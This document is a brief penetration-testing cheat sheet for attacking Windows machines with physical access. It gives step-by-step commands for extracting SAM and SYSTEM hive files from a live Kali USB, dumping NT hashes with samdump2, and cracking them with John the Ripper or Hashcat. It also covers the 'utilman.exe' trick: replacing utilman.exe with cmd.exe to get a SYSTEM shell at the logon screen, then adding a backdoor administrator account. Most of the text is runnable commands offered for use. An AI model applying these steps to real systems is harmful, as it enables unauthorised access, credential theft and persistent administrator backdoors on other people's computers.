# - USB Live Kali# - Mount the Windows system disk# - Get SAM and SYSTEM files from "C:\Windows\System32\config\"# - Extract hashes → samdump2 SYSTEM SAM > hash.txt# - Crack hashes using JTR (john -format=NT hash.txt) or Hashcat# - You may have to use “bkhive" on the SYSTEM file first# - John format can also be NT2
Utilman.exe attack
# You can access a SYSTEM cmd shell if you have access to the filesystem# utilman.exe can be run BEFORE login by "WinKey + U"# If you can access filesystem and change utilman.exe by a cmd.exe, SYSTEM shell will be run.# Access can be done by live bootable key (Linux, Windows..)# From a Windows 10 bootable key -> SHIFT + F10 to access filesystem
move d:\windows\system32\utilman.exe d:\windows\system32\utilman.exe.bak
copy d:\windows\system32\cmd.exe d:\windows\system32\utilman.exe
# OR
C:\
cd windows\system32
ren utilman.exe utilman.exe.bak
copy cmd.exe utilman.exe
# Then on the logon screen --> WinKey + U# And then
net user NewGuy abc123 /add
net localgroup Administrators NewGuy /add
# Reverting# To restore utilman.exe, in the Command Prompt type in:
C:
cd windows\system32
del utilman.exe
ren utilman.exe.bak utilman.exe